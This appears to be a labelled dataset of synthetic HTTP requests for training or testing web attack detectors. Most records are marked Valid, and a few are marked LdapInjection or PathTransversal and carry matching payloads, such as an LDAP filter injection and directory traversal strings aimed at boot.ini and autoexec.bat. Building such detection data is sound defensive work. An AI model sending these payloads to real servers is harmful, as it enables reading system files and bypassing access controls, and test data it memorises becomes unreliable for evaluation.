Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Aug 07 01:17:47 GMT
Last-Modified: Fri, 03 Apr 09 13:28:10 UTC
Host: 161.183.23.177:80
Connection: iflet
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 142.179.215.207
Cookie: tiaidppnai=00630
Cookie2: $Version="5"
Date: Wed, 23 Nov 05 23:16:47 UTC
ETag: "T.KnvkDquWa5rby"
Expect: 100-continue
From: hAcasd@ertucieec.de
If-Modified-Since: Sat, 20 Aug 05 05:33:18 UTC
If-Unmodified-Since: Sat, 22 May 04 22:34:43 CET
If-Match: "jYyG0Vw3ecOPnygZ_Fqu"
If-None-Match: *
If-Range: Fri, 31 Oct 08 02:30:22 GMT
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: zrmksr d9tnue=cunsrA5
Range: 1867-,-2727
Referer: http://tThaa.fr/t1acpeu/lHet.mdb
TE: gzip,trailers,chunked;q=0.9
Trailer: Date
User-Agent: Mozilla/5.6 (X11; U; Linux i586 1.2; bt-TI; rv:1.0.5) Gecko/20691971
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: 5holu/6.9 77.165.28.161, 6.4 179.245.225.131
Transfer-Encoding: ler2s
Upgrade: aiiee/8.2, tosd/8.9
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mseeensIweq6=S&ROKHm_s=vasTlty&aigloiqrea=dIK3JB&etuudoolu=492&cla=8285&nctalr=aTcjI5z8MD&7httpsbin56divlike@locationL=vkPxgtT1&sngjtdeKt3e=oN &nPh4neuwt=emBci&WS.bPJJ=eOSI in0autoexec)hq

End - Id: 34592
Start - Id: 15548
class: Valid
GET /_SOybK4/dyeesoyeHURbqaofh38/wY.tiff? HTTP/1.0
Host: www.TeSi0a.biz:494
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.4, windows-1258
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 97.239.232.84
Cookie: nirr3h3=input\eN;cesHaed=6765798726;d2ka=eXcraY
Cookie2: $Version="640"
Date: Thu, 22 Jan 04 23:52:02 GMT
ETag: "Cqt5eE91-djhUSQE"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Thu, 21 Sep 06 21:10:08 GMT
If-Unmodified-Since: Sat, 22 Oct 05 10:59:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: aei68w feBu6h=iV8ysrhR
Authorization: Basic ZHRzdDpvdmhv
Range: 1-622060
Referer: /dtaavd.tiff
TE: trailers,deflate,gzip;q=0.9
Trailer: Expect
User-Agent: r8dn7 (kx6iWo1; nT5iVvu.W; tGywl9ZF; aR4e6r)
UA-CPU: x86
UA-Disp: 8876,6331,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5730x198
Via: 9.3 205.88.121.35, FTP/9.2 238.16.0.115
Transfer-Encoding: deflate
Upgrade: oou8R/3.5, een2ct/1.0, 2ihe/9.1, S4anr/6.7
Warning: 093 238.27.6.188 "ieimodtr2ng0rf8tn" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 4557726217620382027
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15548
Start - Id: 13192
class: Valid
GET /nn5lt/91Rivtsv/sVuzaWMFuMe1-/eb1Tanzltj9s8ni9evan.htm? HTTP/1.1
Host: 67.35.145.96:68
Connection: eafeko
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 169.235.34.90
Cookie: hstrkoCdeaeslc= eEvart
Cookie2: $Version="70"
Date: Thu, 09 Jun 05 20:03:39 CET
ETag: W/"CHJemz4YjAijP7F-"
Expect: ieT3=ahcnNnn
From: rejnuaHz@hckar.biz
If-Modified-Since: Sun, 24 Dec 06 13:03:28 GMT
If-Unmodified-Since: Fri, 17 Nov 06 10:50:43 UTC
If-Match: "hHBLic6@x.xSraadZi"
If-None-Match: "CfeWPoO9Lw2kcRLn7W"
If-Range: "DCrNziWDQFDrkkxc25Hj"
Max-Forwards: 6
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="gohid"
Authorization: Digest nonce
Range: 645-,3478-02,76763-7861
Referer: /Mier/iioniel/reo1y/aaaSax/olivhi.exe
TE: deflate,trailers
Trailer: Date
User-Agent: Mozilla/0.6 (compatible; MSIE 0.3; Unix; t3f9; lrnde07)
UA-CPU: x86
UA-Disp: 185,098,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 992x6329
Via: FTP/7.8 236.155.135.124
Transfer-Encoding: compress
Upgrade: e0t/7.4
Warning: 093 www.sqesrdhj.jpeg "auusyDnie" "Tue, 02 May 06 18:48:59 CET"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 2985337239117485
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13192
Start - Id: 29717
class: Valid
GET /l4NMpVCiLCh_wYZb7/wwTS@nEMOJeRBdzXb.asmx? HTTP/1.0
Host: www.gtc3.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: e-lih;q=0.8, y-nqbmce;q=0.5, lksisv-Rh8r
Cache-Control: 9heg=hhqtU
Client-ip: 193.153.56.245
Cookie: ittivsdrnCbonls=936;w2ipdstiabeysl=hLs9fx_1Whj;anOealhyaesc=60449277;6a8amnt=l ts(tnusr;uzaAX.9u=9290470677;nO9aeactm=7
Cookie2: $Version="8"
Date: Fri, 30 Jul 04 04:04:50 UTC
ETag: "jM1JlLTHaO7whHxUet"
Expect: 100-continue
From: nonai@Twda.it
If-Modified-Since: Mon, 21 Dec 09 18:33:55 CET
If-Unmodified-Since: Tue, 01 Sep 09 02:48:02 GMT
If-Match: "-npcYNkrH8Kp5-qOUr6n"
If-None-Match: "bBNPUBtey@-OXiIkw"
If-Range: "JGH9o7YW3om-fvQMg9"
Max-Forwards: 632
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: Basic aXR0c3JDOkhrNmdl
Range: 229-9780
Referer: /eeqdIe.mdb
TE: trailers,trailers
Trailer: User-Agent
User-Agent: ncufrhsmtnaoetwytnt
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 502x1724
Via: 3.2 www.otlrJ.tiff, 2.7 115.103.240.215, FTP/3.1 22.31.146.100
Transfer-Encoding: identity
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 839 www.Adlc.css "l0hFhseecnn" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 2911766071168
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29717
Start - Id: 3212
class: Valid
GET /88ngYXA0ILrh@.cfm?Jaqheoih=u6ly14w%25msemrm8el&Tip=11634891&.O2XyFB5FK=eF0d4A&mztr=ac%3Ditsor&xonOr=sv.xxqwB-eT&eiadenfrtsi=8IY&yha4itme=44&aep4mwbt=Nfhtpassmn+eoq&8eicarciraars=spxOuoho&Neehrx=as9Hiceisna&nte=u HTTP/1.0
Host: 158.25.229.111:80
Connection: close
Accept: audio/x-wav;q=0.8, video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, gzip, gzip
Accept-Language: ateMslpa-bnwq, ieetlhF-g, t7irmam-nnrz;q=0.9, tw-sqmjeeS
Cache-Control: min-fresh=0792
Client-ip: 192.93.149.37
Cookie: ete=brcp dropu7anmeta=est;osep[;tasi8r=roa;Qlab=nsttreNsVo
Cookie2: $Version="5"
Date: Wed, 11 Jan 06 04:17:00 CET
ETag: "h_ZpFUxEf09uSjp9-uq"
Expect: 100-continue
From: asano6tc@asob.it
If-Modified-Since: Tue, 10 Jul 07 08:59:44 GMT
If-Unmodified-Since: Wed, 17 Nov 04 11:19:59 GMT
If-Match: *
If-None-Match: "TOa0vLHyvFMPVYDq"
If-Range: *
Max-Forwards: 968
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM amlhbnBCSGc3YWFuQWVlYUhlYW82aHV0dTQyY2ZvcmhFZWVkaA==
Authorization: Digest uri=/aasenepL/Ttarpr/dcyonot/uonayra/xsnhtac.doc
Range: -09285
Referer: /easQfo/ea2mqmw/V0teWi/o1P4.php3
TE: trailers
Trailer: Cache-Control
User-Agent: ownoOog
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5712x8255
Via: FTP/5.3 96.15.187.155:0614, 5.7 www.b6Ubga.tiff, 3.5 www.8atinE5j.js
Transfer-Encoding: compress
Upgrade: ehtr/8.3
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 8986930921
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3212
Start - Id: 3954
class: Valid
PUT /ojqhtguhyemhUene/trpey/1stwHz1sn6xpEJV8M/lF63VUft51t9YxfGpl_3.jpg? HTTP/1.1
Content-Length: 10
Content-Language: ooE
Content-Encoding: compress
Content-Location: http://uhiU5xF.st/laet/l7i5vtc/laaaede/rilgdp/uteeLaw.nsf
Content-MD5: QWVhaXJ0aGFvY2xvbnR0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 08:49:39 GMT
Last-Modified: Tue, 01 Sep 09 03:21:15 GMT
Host: 76.58.119.133
Connection: vgqvatng
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-stale=441
Client-ip: 129.13.135.93
Cookie: yeeeho=l0echohTbgsoundpDt
Cookie2: $Version="1"
Date: Wed, 09 Jan 08 22:16:17 GMT
ETag: "_3WE-QDX-MX9tES"
Expect: 100-continue
From: cmuY8@esu1e.st
If-Modified-Since: Sat, 01 Jul 06 17:18:55 GMT
If-Unmodified-Since: Thu, 22 Mar 07 06:35:08 GMT
If-Match: "Gg53k2s7VldMVAhzC"
If-None-Match: "3V6@lu6Q1ZrqcM8jW9b"
If-Range: "mdV@Om2a6qguKGv"
Max-Forwards: 3
MIME-Version: 3.3
Pragma: avenN='hanai'
Proxy-Authorization: Digest cnonce="yoehanfr"
Authorization: Basic YXdxczpkYmhqZWk=
Range: 896403-560156,-23134
Referer: /33dxpg/irwesO/Enhqj.png
TE: deflate,trailers
Trailer: Accept
User-Agent: Mozilla/5.5 (Windows; U; WinNT 3.9; pr-na; rv:7.1.5) Gecko/13401970
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6900x1160
Via: 8.4 www.drsdeee.png
Transfer-Encoding: deflate
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 936 www.tr75t.jpg "uttrnpTleng4ul" 
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 194828763
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

snt=cilhmu

End - Id: 3954
Start - Id: 20594
class: Valid
GET /rolCshbr16mt/t0Bk/m9k/erelNhqdWoorL/C./hY43N/05ilG6-S6Th5/1oirfnIiz/l9rfU/jrRpd/3n5nI5eon.mdb?0ly4lea7ae=n&enhob0roephgXg=9&tsasJlo=h_EX-yoW_A&reb8d4h=ws%7En&IZLtS6iframeX1cj=34138 HTTP/1.1
Host: 161.34.157.72
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 208.232.197.213
Cookie: ha9eowet=s<;ydN1aeHtc= @t>ounionsa;ai4zma=nqMb3G8zt
Cookie2: $Version="28"
Date: Sat, 07 Mar 09 09:03:02 UTC
ETag: "_JuxaDVkMU8e0Oym"
Expect: 100-continue
From: ts5bme9@rv7as.net
If-Modified-Since: Fri, 02 Jun 06 02:55:00 GMT
If-Unmodified-Since: Sun, 05 Mar 06 11:27:40 CET
If-Match: "L65QcQ.983S@ObP0"
If-None-Match: *
If-Range: ".15PE1jVvNcZnjpJ"
Max-Forwards: 294
MIME-Version: 6.7
Pragma: 3rdn=SEse
Proxy-Authorization: Digest username="weion"
Authorization: Digest nc=2bca92A6
Range: 8188-
Referer: /glSn/a9qo3en.php3
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: nuqzGy http://www.okanni.st
UA-CPU: StrongARM
UA-Disp: 265,2929,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1074x5578
Via: nl3ehu/5.1 www.hierrwhd.html
Transfer-Encoding: compress
Upgrade: 1bh2nl/0.8, aHt/2.8
Warning: 085 www.nNmehRA.gif "mrtsh7o" "Wed, 07 Feb 07 15:55:05 GMT"
X-Forwarded-For: 16.249.84.121
X-Serial-Number: 999844116491308
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20594
Start - Id: 14687
class: Valid
GET /ZNtJipMHnhtaccesccxrcpwp-/pmKjOHIoOtgFaD/etodjuatmavoftps.aspx? HTTP/1.0
Host: 105.74.95.4
Connection: close
Accept: audio/*;q=0.6, application/*, video/quicktime
Accept-Charset: windows-1253, x-mac-roman;q=0.7
Accept-Encoding: deflate, identity;q=0.0, deflate;q=0.5, deflate
Accept-Language: zulAtwm-Rnees3en, nthe-i8, cnt-0seeuuma, m2es-e;q=0.0, Y-mn2et1
Cache-Control: max-stale
Client-ip: 13.86.30.219
Cookie: fnOpotdtwe=5ccia ysayo0t;hJUmR0=rs3h;al2erznoFe4ne= Isrwme2ectR
Cookie2: $Version="0"
Date: Sat, 09 Sep 06 18:49:02 GMT
ETag: "uHBn0QQncCl0QP7G0hfy"
Expect: yapnsalx=ezf0t0n;h9uen
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Wed, 21 Jan 04 07:07:40 GMT
If-Unmodified-Since: Fri, 18 Sep 09 14:51:01 UTC
If-Match: *
If-None-Match: "PznovYQ1AeCq0UG"
If-Range: Sun, 06 Mar 05 24:47:51 CET
Max-Forwards: 09
MIME-Version: 3.3
Pragma: Tcoo3ac='NiH'
Proxy-Authorization: EOoh Ellxd=Dta1et4X
Authorization: NTLM bGRTb2hlcjg4c29yYnBuc3Rpc29USmdhb2N0YXQ5YVF0cmdzMHR3Yzhzc21wT2Ft
Range: 07-
Referer: http://www.8obi0h0b.fr/euhvpn/4letadb/vpebe/vcggt5.wav
TE: chunked
Trailer: Date
User-Agent: atloosrsCo5dnii7intd
UA-CPU: x86
UA-Disp: 1207,004,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0368x227
Via: 6.9 www.iedtPfis.js, FTP/3.7 www.2eaicMus.png, i5da/6.0 203.200.197.200
Transfer-Encoding: identity
Upgrade: f01ie/0.8
Warning: 475 255.62.238.61 "aoneo" 
X-Forwarded-For: 90.226.61.85
X-Serial-Number: 5935364150091795
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 14687
Start - Id: 9487
class: Valid
GET /Ypi6B@WoptYuQrcpAS/nLKHx2mVmLn/ra/-ncSAK/Nroii/i1ettezXounwc6T/1dieg/h4En/keft/qcics9uttcf/likeaSYC.cfm?885gVform-75j=9523&alkt3enio=853146 HTTP/1.0
Host: www.Teila57Xhi.org:80
Connection: ErI1i
Accept: */*;q=0.8
Accept-Charset: windows-1255, utf-8;q=0.6, iso-2022-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 0.101.49.45
Cookie: hthghlykW4shsh=uenoFw7stake;sedzsber=b6replace1/;en74p=tri)f;eodhwliroSernan=92
Cookie2: $Version="2"
Date: Wed, 03 Jun 09 03:57:29 UTC
ETag: W/"OV8lIQPxR4a1ovUasGG"
Expect: 48mdj
From: gr7u@tiioRdzAr.net
If-Modified-Since: Fri, 11 Jan 08 19:15:55 CET
If-Unmodified-Since: Fri, 03 Mar 06 11:29:44 GMT
If-Match: "7y4-IJDIhkPLA-clvpZ"
If-None-Match: *
If-Range: Tue, 24 Oct 06 14:34:23 CET
Max-Forwards: 9523
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: Digest uri=http://Maei.org/cohs/l8st/54htd8/bzog/mymnosS.pdf
Range: -6,7-441
Referer: /jrsEPCsa/miusb/3eirdrh.swf
TE: gzip
Trailer: Accept
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 8.5; mb-Mt; rv:9.3.3) Gecko/75939861
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x7075
Via: FTP/8.8 www.tauwos.gif
Transfer-Encoding: gzip
Upgrade: esh/3.4, iiNcm/1.6, viuVh/9.2, Rxd/5.7, ahy/0.5
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 477624776956
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9487
Start - Id: 8270
class: Valid
GET /bAagtjIeherw1o0tiE/uo65_aNzW/umoestfOuia.htm? HTTP/1.0
Host: www.vttien.biz
Connection: enn3gw
Accept: image/gif;q=0.3, text/plain;q=0.4
Accept-Charset: windows-1257;q=0.4, iso-8859-2, windows-1255, x-mac-chinesesimp;q=0.5
Accept-Encoding: *
Accept-Language: nhFg-be, u6lpshn6-ncd, traa-dvae5, tnbe-ehypsn8i;q=0.8, de-lohrd5p;q=0.4
Cache-Control: no-transform
Client-ip: 0.100.95.162
Cookie: S3ywtIogteqn=ee8tjii2we;iOddivEF=larYhae5nauqeimtto
Cookie2: $Version="65"
Date: Wed, 03 Mar 10 09:24:27 UTC
ETag: ".Xq_e.D36F0CLCo9e"
Expect: 100-continue
From: teSs@0iptauimo.cz
If-Modified-Since: Mon, 19 Apr 04 03:43:05 GMT
If-Unmodified-Since: Tue, 02 Aug 05 17:14:08 UTC
If-Match: "9vqsV@CzYPHFnDM6"
If-None-Match: *
If-Range: Wed, 06 Apr 05 07:05:33 CET
Max-Forwards: 7388
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: l6sult ptotur=gueoiO
Authorization: NTLM YnB5bm9vbWxvcnJlaHN4bzlnc2Nkbjdlc2kwZndhamFiNHBwcW1MZFVwdWNB
Range: -9
Referer: /49fi/rtmrg/wtlmnnft.ace
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 3.4; uo-Ir; rv:8.0.9) Gecko/72713284
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 833x678
Via: 2.5 215.149.64.226, 0.1 www.fDcB1.jpeg
Transfer-Encoding: gzip
Upgrade: r88e/3.1, eipneG/6.0, tm7/7.0, feaq/2.0, Fat8/9.6
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 07344757970707367
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8270
Start - Id: 38960
class: LdapInjection
GET /l1eseshl1neA8e/qnllhqe/sgcyElcl/nDuWW5ucy/oonteab/oIsieirdmekI.html?ss8alout7Gweti=c389nI_142SG&qm8uroneenxAkc=s14%29%28++++%7C%28ittwr%3D*%29 HTTP/1.1
Host: www.rvts0.org:80
Connection: rteyeC
Accept: */*
Accept-Charset: x-mac-korean, x-mac-japanese, iso-8859-9;q=0.0, iso-2022-kr;q=0.9
Accept-Encoding: compress, identity, deflate
Accept-Language: *;q=0.3
Cache-Control: le=e9haS
Client-ip: 65.168.89.85
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="4"
Date: Sun, 24 Jun 07 11:19:02 UTC
ETag: W/"CWyyv9@t_OHQUFO"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 15 May 06 21:03:14 GMT
If-Unmodified-Since: Sun, 24 May 09 10:40:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2008
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Basic Z2k4dDppc2Rzc2ZO
Range: -764,-7
Referer: /7Jyt1tet/mtsHsael/cnloys.dll
TE: deflate;q=0.2
Trailer: If-Match
User-Agent: naoes/1.8.3.8.9
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: 3.6 117.87.47.243:737, FTP/1.7 www.koafe.css:7, 6.4 www.itrnone.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38960
Start - Id: 26574
class: Valid
GET /qweoteoepI/bVmYindropadmin/chNrtnbaauedra/bNzioyPftpPT/whtpassqNb0uBewWLscript%uA/4o/ilDiDb6US1NWv/5ovaRrNmnscd.asp? HTTP/1.0
Host: www.s5ic9s2nt.fr:11
Connection: keep-alive
Accept: image/png;q=0.1, application/*;q=0.8, image/png;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: ag-ihhHeAA, radi-oco;q=0.8, i8dmpii-ulsto;q=0.1
Cache-Control: no-store
Client-ip: 126.247.210.228
Cookie: dkoretum=ajthmk2sa9scwu;hewrnrd=pce;7kjshAetmwosh=5;sWe=uxdohtsetNsndf
Cookie2: $Version="969"
Date: Sat, 08 Dec 07 12:38:01 UTC
ETag: "jd-5eFh-5QUP4IO"
Expect: seocoz2l
From: ndorli@calYa.it
If-Modified-Since: Sun, 10 Apr 05 13:26:28 GMT
If-Unmodified-Since: Thu, 21 Jan 10 04:30:17 CET
If-Match: *
If-None-Match: "BF7fAdkd8Imf3orGu"
If-Range: "8ZOuS83hb_NhuP2hw-aK"
Max-Forwards: 0
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://sniw.net/oseoo/7nuds5/tfhcgi.wmn
Authorization: Digest nonce
Range: 5377-633943,-28808
Referer: /omt9z8ue.mpeg
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 7.0; n0-2h; rv:4.7.4) Gecko/14895106
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6083x8354
Via: 5.1 48.82.94.238:00463
Transfer-Encoding: identity
Upgrade: fmyf/7.7, s17U/8.8, yna/1.4, uaae/7.2, crI/4.0
Warning: 032 www.oghexy5t.html "njwthy" 
X-Forwarded-For: 14.228.155.87
X-Serial-Number: 693373977262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26574
Start - Id: 36079
class: PathTransversal
GET /oHp/JT7naru/unhkaasqDlBt17i/7r/having8.Xhtacces_O.php4?ty1fDeos8easgt=7t1povaumnbtfo&etue=c%3A%5Cwinnt%5Cboot.ini&diap=2839 HTTP/1.0
Host: 123.52.237.168:23642
Connection: close
Accept: audio/*
Accept-Charset: iso-2022-jp;q=0.0, x-mac-chinesesimp
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: max-age=2452
Client-ip: 189.28.10.96
Cookie: lrtu=8gqwtUub7j;Rugumzjq=aemmetch
Cookie2: $Version="080"
Date: Wed, 10 Jan 07 08:08:02 UTC
ETag: ".pe2aGJrRMzZbqnQAMiF"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 02 Jan 07 09:51:21 CET
If-Unmodified-Since: Fri, 23 Nov 07 08:04:32 UTC
If-Match: *
If-None-Match: "2Bu-xL3QD33X6BRyUOnP"
If-Range: Thu, 01 Apr 04 09:09:13 UTC
Max-Forwards: 3469
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: diW0 aiue8nd=tsaL
Range: 67-310757
Referer: http://www.oat34.ch/sq6nij/oimtulrn/0wio/e1dobneY.png
TE: chunked;q=0.9,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.4 (X11; U; Unix 7.2; o7-6a; rv:0.8.1) Gecko/92802588
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 039x0543
Via: FTP/5.9 www.yul7eS.htm, FTP/7.4 www.kostasok.jpg, 4.8 www.SyHStf3S.js
Transfer-Encoding: deflate
Upgrade: sztad/3.9, y9oto/3.0
Warning: 082 205.217.116.11 "oJcacgojmdrj" "Sun, 02 Dec 07 19:43:37 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36079
Start - Id: 45792
class: PathTransversal
GET /esXxzCmccvCRRGS1/coqhr/raodyeolsrnEmyestcoh/aJPYxG/bznJ7Ib/jcBI7KU6k/rebnaenFtebetsul/th33slF3/ioKgwYH3Wg_HUSdAn/qTuMmpobjecta.bin?iwras8te=5525&hk0swne=dgg%40rtwe&pQraCenar=344163&frcpced=esostylel&ixpiny=lupu4zxn&hn=lnall&rfeea=eRzRb&EnullBxxRqwU8UA=t4rhr&yet45tetsefn=h+f&IsieeseimP=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&mn9Rl=46&edE=9 HTTP/1.1
Host: 249.62.52.54
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish, iso-8859-8, iso-8859-2;q=0.3
Accept-Encoding: deflate;q=0.1, compress, compress
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 40.147.120.92
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="08"
Date: Sat, 28 Aug 04 14:56:22 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: tehZutuc@dllzd.uk
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Tue, 19 Jul 05 15:42:05 CET
If-Match: "T-6CAuSTPc782XacF6P"
If-None-Match: "tm2vALpcmhbfa@eOmu"
If-Range: Wed, 13 Oct 04 04:01:46 GMT
Max-Forwards: 41
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: attk esmu5=OSiF3tt
Authorization: nt9ro ihteu=d6nton
Range: 855-
Referer: http://utt59.org/iaxa/ctcatta/iwtZr/dmeraL/etaogooo.jsp
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/1.4 (compatible; MSIE 9.2; SunOS sun4u; ooi9y; thliosn; tttco8dv)
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: 9.3 150.184.72.220, HTTP/0.9 www.aRrRc.jpeg:5595, 0.7 229.182.187.118
Transfer-Encoding: deflate
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 110.58.93.193
X-Serial-Number: 06918680418533
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45792
Start - Id: 32326
class: Valid
GET /h3ovpG7JcmT.Af8Wi/1eTNgcem0releu/ngOYsbCTxC_eq54z/tFXMN5F1mRkIBX/aVj.FfJaxnflcMZmN6u/hQ6lDH5CUnl0tCyYqa8F/aUA7F0c@cHCFiq.swf?t9cbrtnnyheer=29696446 HTTP/1.0
Host: 49.238.32.143:80
Connection: close
Accept: application/postscript, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 155.74.53.10
Cookie: ssesrsn4npmxnid=dnVcudFSfE;nraueo0tdmomab=442414;V5.YXnP6N=o@ilogNiay1andte;sWiEstopdh=sikiihTfofluo
Cookie2: $Version="9"
Date: Sun, 01 Nov 09 03:28:30 UTC
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Mon, 23 Jul 07 17:38:19 CET
If-Unmodified-Since: Thu, 29 Dec 05 22:09:11 GMT
If-Match: "sO-Hjpx9sJc2LcM7vl"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Tue, 01 Jan 08 16:32:54 GMT
Max-Forwards: 06
MIME-Version: 1.0
Pragma: no-cache
